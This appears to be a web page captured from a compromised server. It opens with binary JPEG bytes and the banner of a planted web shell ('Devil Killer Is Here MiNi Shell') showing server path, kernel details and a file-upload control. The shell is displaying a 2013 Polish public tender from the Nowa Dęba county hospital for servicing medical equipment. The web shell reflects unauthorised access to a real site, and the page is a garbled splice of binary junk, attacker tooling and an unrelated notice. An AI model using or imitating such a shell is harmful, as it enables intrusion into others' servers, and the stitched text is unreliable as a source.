JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/298416-N-2013.html

<p class="kh_header"><b>Nowa Dęba: Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i  aparatury medycznej
dla Szpitala Powiatowego  w Nowej Dębie</b><br>
<b>Numer ogłoszenia: 298416 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. C. Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 15 8462651 w. 120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zoznowadeba.ires.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i  aparatury medycznej
dla Szpitala Powiatowego  w Nowej Dębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie wykonywania pogwarancyjnych okresowych przeglądów technicznych oraz napraw bieżących sprzętu i  aparatury medycznej
dla Szpitala Powiatowego  w Nowej Dębie z podziałem na części ( Pakiety). 
1.Zakres świadczonych usług obejmować będzie  utrzymanie sprawności techniczno - eksploatacyjnej urządzeń medycznych znajdujących się na wyposażeniu Szpitala Powiatowego w Nowej Dębie, wymienionych w Załączniku nr 1- Wykaz Aparatury i Sprzętu Medycznego - Cennik szczegółowy do SIWZ   
w zakresie: pogwarancyjnych okresowych przeglądów i konserwacji zgodnie z zaleceniami producenta urządzeń oraz  Ustawą z dnia 20 maja 2010r.o wyrobach medycznych ( Dz.U. nr 107 poz, 679 z późn.zm) jak również  bieżących napraw i prowadzenia  paszportów urządzeń medycznych.
2.Wykonawca oświadcza, że :
- dysponuje określonym przez wytwórcę zapleczem technicznym, częściami zamiennymi, częściami zużywalnymi i materiałami eksploatacyjnymi;
- posiada określone przez wytwórcę instrukcje serwisowe wyrobu oraz odpowiednie procedury i instrukcje wykonywania czynności serwisowych;
- zatrudnia osoby posiadające określone przez wytwórcę kwalifikacje i doświadczenia zawodowe.
3.Przedmiot zamówienia obejmuje:
1)utrzymanie sprawności techniczno - eksploatacyjnej urządzeń objętych niniejszym zamówieniem,
2)konserwację i zachowanie gotowości eksploatacyjnej opartej o zalecenia producentów urządzeń,
3)przeprowadzanie okresowych przeglądów i kontroli stanu technicznego sprzętu medycznego,
4)prowadzenie paszportów technicznych sprzętu medycznego,
5)prowadzenie kart naprawy urządzeń,
6)okresowe kontrole sprzętu pomiarowego (kalibracja),
7)wycena aparatury medycznej oraz sporządzanie notatek o stanie urządzeń, w tym nie nadających się do naprawy.
4.SZCZEGÓŁOWE WARUNKI REALIZACJI ZAMÓWIENIA:
- Konserwacji i przeglądom podlegają urządzenia i aparatura medyczna wymieniona w Załączniku nr 1 do SIWZ.
- Okresowe przeglądy techniczne będą wykonywane z częstotliwością określoną w Załączniku nr 1 - Wykaz Aparatury i Sprzętu Medycznego - Cennik szczegółowy do SIWZ i w terminach zgodnie z harmonogramem ustalonym przez Zamawiającego w porozumieniu z Wykonawcą wynikających z właściwości danego sprzętu/  aparatury, obowiązującymi instrukcjami, standardami, normą  jak również 
wynikających z zaleceń producenta, 
- Konieczność przeprowadzenia napraw lub wymiany części zamiennych na nowe Wykonawca będzie uzgadniał z Działem  Technicznym  Zamawiającego, z podaniem przewidywanych kosztów w formie kalkulacji cenowej /  kosztorysu.    
Wykonanie ich nastąpi po akceptacji kalkulacji cenowej / kosztorysu przez Kierownika Zamawiającego.
- Przedmiot zamówienia mogą wykonywać osoby posiadające kwalifikacje do konserwacji urządzeń medycznych, posiadające kwalifikacje do dozoru nad eksploatacją urządzeń, przeszkolone u producenta w zakresie przeglądów urządzeń.
-Czynności konserwatorsko - sprawdzające sprzęt medyczny obejmują w szczególności:
1)określenie rodzaju uszkodzenia,
2)ewentualną naprawę zużytych podzespołów lub ich wymianę, po akceptacji Zamawiającego,
3)wymianę materiałów eksploatacyjnych,
4)sprawdzenie prawidłowości działania,
5)sprawdzenie i ewentualne czyszczenie elementów aparatury i urządzeń (,w tym mycie chemiczne wywoływarek RTG
6)ustawianie (regulacja) wymaganych przez producenta parametrów
7)w przypadku urządzeń podlegających odbiorowi przez inspektorów UDT: przygotowanie urządzenia do odbioru, wykonanie czynności w związku z zaleceniami inspektorów UDT, uczestnictwo w odbiorach z  udziałem inspektorów UDT.
-Każda czynność konserwatorska oraz sprawdzenie sprzętu pomiarowego musi zostać potwierdzone w karcie pracy i wpisane przez Wykonawcę do paszportu technicznego urządzenia.
- W przypadku wyłączenia urządzenia z użytkowania do Wykonawcy należy obowiązek umieszczenia na  niesprawnym  urządzeniu czytelnej informacji: urządzenie niesprawne nie używać lub  urządzenie przeznaczone do naprawy - nie  używać .
- Zgłoszenia konieczności przeprowadzenia konserwacji lub naprawy przekazywane będą w formie telefonicznej lub pisemnie drogą e-mail, przez upoważnionego przedstawiciela Zamawiającego.
-Maksymalny czas reakcji Wykonawcy od momentu zgłoszenia  wynosi 48 godzin (w dni  robocze), lub w pierwszy dzień roboczy po zgłoszeniu w dniu wolnym od pracy.
-Usunięcie usterek zostanie dokonane w przypadku dostępności części zamiennych w terminie 5 dni roboczych od otrzymania przez Wykonawcę akceptacji kosztów naprawy, a w przypadku napraw bardziej skomplikowanych w terminie 10 dni roboczych od otrzymania akceptacji kosztu naprawy.
-Gwarancja na wymienione części zamienne i materiały nie może być krótsza od gwarancji danej przez ich producenta.
-Zamawiający zastrzega sobie prawo do zmiany ilości urządzeń podlegających konserwacji i przeglądom technicznym, w  ramach przeprowadzonych postępowań kasacyjnych.
5.Zamówienie obejmuje 81 Pakietów - części (dopuszcza się składanie ofert częściowych na poszczególne Pakiety lub na całość  zamówienia).
Zamawiający  dopuszcza składanie ofert częściowych.Części zamówienia:
PAKIET  Nr 1 -  Negatoskopy				                             
PAKIET  Nr 2 -  Monitor					                 PAKIET  Nr 3 -  Ssaki						      
PAKIET  Nr 4 -  Lancentron					                  
PAKIET  Nr 5 -  Pompy Infuzyjne firmy KWAPISZ		
PAKIET  Nr 6 -  Ssaki elektryczne					        
PAKIET  Nr 7 -  Koncentratory tlenu					 
PAKIET  Nr 8 -  Aparatura do fizykoterapii 				      
PAKIET  Nr 9 -  Aparatura Rtg				             
PAKIET  Nr 10 - Aparatura do znieczulenia ogólnego		  
PAKIET  Nr 11 -  Mikroskopy					              PAKIET  Nr 12  - Aparatura endoskopowa firmy PENTAX			  
PAKIET  Nr 13  - Lampy operacyjne i zabiegowe			 	
PAKIET  Nr 14  - Aparatura laboratoryjna				    
PAKIET  Nr  15  - Aparatura  laboratoryjna				     
PAKIET  Nr 16  - Wirówki laboratoryjne				     
PAKIET  Nr 17  - Mikroskopy laboratoryjne				      
PAKIET  Nr 18  - Cieplarki 						     
PAKIET  Nr 19 - Aparatura do zabiegów chirurgicznych		 	 
PAKIET  Nr  20  - Pompy infuzyjne					       
PAKIET  Nr  21 -  Urządzenia do sterylizacji				     
PAKIET  Nr  22 -  Aparaty EKG					      
PAKIET  Nr  23 -  Kardiomonitory					    
PAKIET  Nr  24 -  Pulsoksymetry, kapnografy, kardiotokografy	                   
PAKIET  Nr  25 -  Aparatura RTG                                                            
PAKIET  Nr  26 -  Stoły operacyjne i zabiegowe			    
PAKIET  Nr  27 -  Lampy zabiegowe					        
PAKIET  Nr  28 -  Inhalatory                                           		        
PAKIET  Nr  29 -  Stanowisko do pielęgnacji noworodka                              PAKIET  Nr  30 -  Aparatura do fizykoterapii                                                
PAKIET  Nr  31 -  Aparatura do fizykoterapii                                                  
PAKIET  Nr  32 -  Kardiostymulator zewnętrzny                                         
PAKIET  Nr  33 -  Aparatura do fizykoterapii                                                
PAKIET  Nr  34 -  Aparatura do fizykoterapii                                                   
PAKIET  Nr  35 -  Pompa infuzyjna strzykawkowa                                        
PAKIET  Nr  36 -  Defibrylatory                                                                   PAKIET  Nr  37 -  Inkubatory                                                                          
PAKIET  Nr  38 -  Detektory tętna                                                                   
PAKIET  Nr  39 -  Lampa do terapii noworodków	                             	 
PAKIET  Nr  40 -  Urządzenie do badań wysiłkowych                               
PAKIET  Nr  41 -  Aparat EEG                                                                     PAKIET  Nr  42 -  Promiennik podczerwieni				        
PAKIET  Nr  43 -  Myjnia Hydrim				                      
PAKIET  Nr  44 -  Aparat KTG					       
PAKIET  Nr  45 -  Myjnie                                                                              
PAKIET  Nr  46 -  Kolposkop                                                                      PAKIET  Nr  47 -  Lampa operacyjna					      PAKIET  Nr  48 -  Pulsoksymetry 					     PAKIET  Nr  49 - Aparat USG                                                                          
PAKIET  Nr  50 - Aparat Rtg						      PAKIET  Nr  51 -  Aparat Rtg						         PAKIET  Nr  52 -  Ultrasonografy					        PAKIET  Nr  53 -  Ultrasonograf					        PAKIET  Nr  54 -  Pompy infuzyjne					        PAKIET  Nr  55 -  Aparatura do zabiegów elektrochirurgicznych	     
PAKIET  Nr  56 -  Stół operacyjny					    PAKIET  Nr  57 -  Urządzenie do badania wydolności płuc		       
PAKIET  Nr  58 -  Reduktory tlenowe					      PAKIET  Nr  59 - Lampy zabiegowe i inne				        PAKIET  Nr  60 - System monitorowania glikemii Guardia		   
PAKIET  Nr  61 -  Respirator						         PAKIET  Nr  62 -  Defibrylatory					         
PAKIET  Nr  63 -  Aparatura laboratoryjna				     PAKIET  Nr  64 -  Urządzenia do sterylizacji				      PAKIET  Nr  65 - Ultrasonograf				                  PAKIET  Nr  66 - Skanery						     PAKIET  Nr  67 -  Wywoływarka automatyczna do zdjęć		            
PAKIET  Nr  68 -  Spirometr						   PAKIET  Nr  69 - Myjki ultradźwiękowe				           
PAKIET  Nr  70 -  Aparatura do zabiegów elektrochirurgicznych	              PAKIET  Nr  71 -  Holter					           
PAKIET  Nr  72 -  Aparat do urodynamiki				         PAKIET  Nr  73 -  Spirometr diagnostyczny				        PAKIET  Nr  74 -  Inkubator otwarty dla noworodków			         PAKIET  Nr  75 -  Aparat CPAP					        PAKIET  Nr  76 -  Aparat USG				
PAKIET  Nr  77 -  Aparatura do Hydroterapii				         PAKIET  Nr  78 -  Aparatura do fizykoterapii				         PAKIET  Nr  79 -  Aparatura do fizykoterapii				       PAKIET  Nr  80 -  Aparatura Rtg					         
PAKIET  Nr  81 -Walidacja aparatury i urządzeń wBanku Krwi - Pracowni Serologii.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.00.00-5, 50.40.00.00-9, 50.42.12.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 81.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów w celu wykazania,iż spełniają w/w warunek. Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług,w okresie  ostatnich  trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których usługi  zostały  wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże  że, zrealizował min. 2 usługi w zakresie świadczenia  usługi  na rzecz jednostek  ochrony zdrowia w tym min. 1 w zakresie lecznictwa stacjonarnego ( szpital)  a jeżeli okres  prowadzenia  działalności  jest  krótszy  - w tym okresie  oraz  załączenie dokumentów potwierdzających, że usługi te  zostały  wykonane  należycie  lub są wykonywane należycie, każde zrealizowane w wartości nie mniejszej niż zaoferowana wartość brutto oferty złożonej w niniejszym postępowaniu, biorąc pod uwagę łączną wartość brutto poszczególnych pakietów -  na które złożono ofertę ;
Dokument ten będzie potwierdzeniem, że Wykonawca posiada doświadczenie w zakresie realizacji usług będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.Ze względu na charakter przedmiotu zamówienia Zamawiający nie żąda od Wykonawców dodatkowych dokumentów w celu wykazania,iż spełniają w/w warunek. Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą - w/g wzoru na Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, załączy do oferty oświadczenie pod rygorem odpowiedzialności, iż dysponuje lub będzie dysponował na czas realizacji zamówienia osobami, które będą wykonywały prace w zakresie oferowanych pakietów posiadają wszelkie kwalifikacje i doświadczenie zawodowe na świadczenie usług serwisowania sprzętu medycznego, a wykaz imienny osób przedłoży przed zawarciem umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, i  zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy wraz z dowodem - potwierdzeniem wpłaty przy sumie gwarancyjnej  nie mniejszej niż 30 000,00 zł .
Wykonawca do oferty załącza oświadczenie, że posiada lub będzie posiadał wskazane ubezpieczenie a polisę przedłoży przed zawarciem umowy.
Dokumenty te będą potwierdzeniem sytuacji ekonomicznej  i finansowej Wykonawcy, zapewniającej realizację usługi  zgodnej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Postanowienia dotyczące wnoszenia  oferty wspólnej przez dwa lub więcej podmioty gospodarcze ( konsorcja / spółki cywilne) :
1.Wykonawcy mogą  wspólnie ubiegać się o udzielenie zamówienia.
2.Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów , przy czym  termin, na jaki została zawarta, nie może być  krótszy niż termin realizacji zamówienia.
3.Wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji 
wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli  każdego z wykonawców winno być dołączone do oferty.
4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy. 
Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania; 
Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane dostawy, wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.Dokumenty są  składane w  oryginale lub kopii  poświadczonej za zgodność  z  oryginałem  przez  Wykonawcę. Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
b) Wypełniony i podpisany  Załącznik nr 1  do SIWZ  - Wykaz  Sprzętu i Aparatury Medycznej - Cennik szczegółowy zależności  od  wybranego pakietu )
c) Wypełniony i podpisany Załącznik nr 2  do SIWZ - Podstawa wyceny prac   
d) Wypełniony i podpisany Załącznik nr 3  do SIWZ - Oferta Wykonawcy ( w zależności  od  wybranego pakietu i dla każdego pakietu oddzielnie)
e) Wypełniony i podpisany Załącznik nr 4 do SIWZ - Oświadczenie o spełnieniu warunków udziału w postępowaniu 
f) Wypełniony i podpisany Załącznik nr 5 do SIWZ -Oświadczenie o braku podstaw do wykluczenia
g) Parafowany na każdej stronie Załącznik nr 6 do SIWZ - Wzór umowy  
h) Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają  z przepisów prawa lub innych dokumentów;
Zamawiający dopuszcza zmianę formy załącznika nr 1 przez Wykonawcę lecz zastrzega,  że  musi zawierać  co do treści wszystkie  dane podane we wzorze do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.ires.pl<br>
